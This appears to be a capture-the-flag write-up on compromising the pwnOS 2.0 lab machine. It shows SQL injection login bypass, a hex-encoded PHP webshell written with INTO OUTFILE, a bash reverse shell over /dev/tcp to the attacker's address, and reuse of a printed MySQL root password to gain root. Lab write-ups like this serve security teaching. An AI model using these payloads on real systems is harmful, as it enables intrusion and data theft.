I"30<p>This is a GNU/Linux machine vulnerable to SQL Injection through which it was possible to write a reverse shell on the server and execute system commands, to gain access to root the password of the MySQL connection was reused.</p>

<h2 id="information-gathering">Information Gathering</h2>
<h3 id="host-discovery">Host Discovery</h3>

<p>The virtual machine has an static IP address set up, so we must assign an IP in the same addressing range, as shown below:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>ip addr add 10.10.10.200/24 dev vmnet1
</code></pre></div></div>

<p>An scan with arp-scan allowed us to detect the address of our target.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>arp-scan <span class="nt">-I</span> vmnet1 10.10.10.0/24                                                   
Interface: vmnet1, <span class="nb">type</span>: EN10MB, MAC: 00:50:56:c0:00:01, IPv4: 192.168.179.1
Starting arp-scan 1.9.7 with 256 hosts <span class="o">(</span>https://github.com/royhills/arp-scan<span class="o">)</span>
10.10.10.100    00:0c:29:a3:96:fa       VMware, Inc.
</code></pre></div></div>

<h3 id="port-scanning">Port Scanning</h3>

<p>A full TCP port scan with nmap discovered two open ports.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>nmap <span class="nt">-n</span> <span class="nt">-v</span> <span class="nt">-T4</span> <span class="nt">-p-</span> 10.10.10.100 <span class="nt">-oG</span> nmap/all-tcp-ports.txt
...
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre></div></div>

<h3 id="service-enumeration">Service Enumeration</h3>

<p>Service detection and script scanning were performed against the target machine in orer to detect more information about open ports.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>nmap <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-p22</span>,80 <span class="nt">-n</span> <span class="nt">-v</span> 10.10.10.100 <span class="nt">-oN</span> nmap/service-enum.txt
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff <span class="o">(</span>DSA<span class="o">)</span>
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 <span class="o">(</span>RSA<span class="o">)</span>
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e <span class="o">(</span>ECDSA<span class="o">)</span>
80/tcp open  http    Apache httpd 2.2.17 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not <span class="nb">set</span>
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.17 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Welcome to this Site!
</code></pre></div></div>

<h3 id="web-enumeration">Web Enumeration</h3>

<p>The web service contains a simple web page with a welcome message.</p>

<p><img src="/assets/images/pwnos2/screenshot-1.png" alt="" /></p>

<p>Running dirsearch allowed other web resources to be discovered.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>dirsearch <span class="nt">-u</span> http://10.10.10.100/ <span class="nt">-w</span> /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
...
<span class="o">[</span>18:41:40] Starting: 
<span class="o">[</span>18:41:41] 301 -  311B  - /blog  -&gt;  http://10.10.10.100/blog/
<span class="o">[</span>18:41:41] 200 -    1KB - /login
<span class="o">[</span>18:41:41] 200 -    2KB - /register
<span class="o">[</span>18:41:41] 200 -   50KB - /info
<span class="o">[</span>18:41:44] 200 -  854B  - /index
<span class="o">[</span>18:41:45] 301 -  315B  - /includes  -&gt;  http://10.10.10.100/includes/
<span class="o">[</span>18:42:32] 302 -    0B  - /activate  -&gt;  http://10.10.10.100/index.php
<span class="o">[</span>18:53:38] 403 -  293B  - /server-status
</code></pre></div></div>

<p>In the web page, a form login is vulnerable to SQL Injection, so the login was bypassed.</p>

<p><img src="/assets/images/pwnos2/screenshot-2.png" alt="" /></p>

<p><img src="/assets/images/pwnos2/screenshot-3.png" alt="" /></p>

<h2 id="exploitation">Exploitation</h2>
<h3 id="mysql-write-privileges">Mysql write privileges</h3>

<p>Another interesting way is to try to write content on the server taking advantage of the SQL Injection vulnerability, the following request tries to dump all users of the database and write them to a file called dump in the includes directory.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s1">' or 1=1 into outfile '</span>/var/www/includes/dump<span class="s1">'-- -
</span></code></pre></div></div>

<p><img src="/assets/images/pwnos2/screenshot-4.png" alt="" /></p>

<p>As we can see the file was written, showing us the only registered user.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>curl <span class="nt">-s</span> http://10.10.10.100/includes/dump                            
1       Dan     Privett admin@isints.com        c2c4b4e51d9e23c02c15702c136c3e950ba9a4af        0       <span class="se">\N</span>      2011-05-07 17:27:01
</code></pre></div></div>

<p>Now we will try to write a webshell on the server, for that we need to know the column numbers.</p>

<p>First we must intercept the login request and send it to <strong>Intruder</strong>, we choose the attack type “sniper”, and highlight the parameter to test.</p>

<p><img src="/assets/images/pwnos2/screenshot-5.png" alt="" /></p>

<p>Set the payload type to “Numbers”, in <strong>Payload Options</strong> we choose numbers from 1 to 10, as shown in the following screenshot.</p>

<p><img src="/assets/images/pwnos2/screenshot-6.png" alt="" /></p>

<p>Then, click on <strong>Start Attack</strong>, as we can see in the following image there are 8 columns.</p>

<p><img src="/assets/images/pwnos2/screenshot-7.png" alt="" /></p>

<p>When trying to enumerate the ninth column the server responds with an error.</p>

<p><img src="/assets/images/pwnos2/screenshot-8.png" alt="" /></p>

<p>Then, we hex encode the webshell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"&lt;?php passthru(</span><span class="se">\$</span><span class="s2">_GET['cmd']); ?&gt;"</span> | xxd <span class="nt">-ps</span> | <span class="nb">tr</span> <span class="nt">-d</span> <span class="s1">'\n'</span><span class="p">;</span> <span class="nb">echo
</span>3c3f70687020706173737468727528245f4745545b27636d64275d293b203f3e
</code></pre></div></div>

<p>We use the following SQL statement to write it to the server.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s1">' and 1=2 union select 0x3c3f70687020706173737468727528245f4745545b27636d64275d293b203f3e,0x20,0x20,0x20,0x20,0x20,0x20,0x20 into outfile '</span>/var/www/includes/z.php<span class="s1">'-- -
</span></code></pre></div></div>

<p><img src="/assets/images/pwnos2/screenshot-9.png" alt="" /></p>

<p>Now we can execute system comands.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>curl <span class="nt">-s</span> <span class="s2">"http://10.10.10.100/includes/z.php?cmd=id"</span>
<span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
</code></pre></div></div>

<p>We set up a netcat listener, and run the following curl request.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>curl <span class="nt">-s</span> <span class="s2">"http://10.10.10.100/includes/z.php?cmd=</span><span class="si">$(</span>urlencode <span class="nt">-m</span> <span class="s1">'/bin/bash -c "/bin/bash -i &gt;&amp; /dev/tcp/10.10.10.200/443 0&gt;&amp;1"'</span><span class="si">)</span><span class="s2">"</span>
</code></pre></div></div>

<p>We got a shell as user www-data, and we upgrade it to a TTY shell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>nc <span class="nt">-vlnp</span> 443
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>10.10.10.200] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.100] 52171
bash: no job control <span class="k">in </span>this shell
www-data@web:/var/www/includes<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s2">"import pty; pty.spawn('/bin/bash')"</span>
www-data@web:/var/www/includes<span class="err">$</span>
</code></pre></div></div>

<p>Listing the web server, in the directory /var I found a MySQL connection file.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@web:/var<span class="nv">$ </span><span class="nb">cat </span>mysqli_connect.php
...
DEFINE <span class="o">(</span><span class="s1">'DB_USER'</span>, <span class="s1">'root'</span><span class="o">)</span><span class="p">;</span>
DEFINE <span class="o">(</span><span class="s1">'DB_PASSWORD'</span>, <span class="s1">'root@ISIntS'</span><span class="o">)</span><span class="p">;</span>
DEFINE <span class="o">(</span><span class="s1">'DB_HOST'</span>, <span class="s1">'localhost'</span><span class="o">)</span><span class="p">;</span>
DEFINE <span class="o">(</span><span class="s1">'DB_NAME'</span>, <span class="s1">'ch16'</span><span class="o">)</span><span class="p">;</span>
...
</code></pre></div></div>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="credential-disclosure">Credential Disclosure</h3>

<p>We switch to user root entering the password to connect to MySQL.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@web:/var<span class="nv">$ </span>su -
su -
Password: root@ISIntS

root@web:~#id
<span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
</code></pre></div></div>

<p>Also we can access via SSH, since root login is anabled in the SSH configuration file.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@web:/var<span class="nv">$ </span><span class="nb">grep</span> <span class="nt">-i</span> <span class="s1">'permitrootlogin'</span> /etc/ssh/sshd_config
<span class="nb">grep</span> <span class="nt">-i</span> <span class="s1">'permitrootlogin'</span> /etc/ssh/sshd_config
PermitRootLogin <span class="nb">yes</span>
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/pwnos2.0<span class="nv">$ </span>ssh root@10.10.10.100
root@10.10.10.100<span class="s1">'s password: 
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
</span></code></pre></div></div>
:ET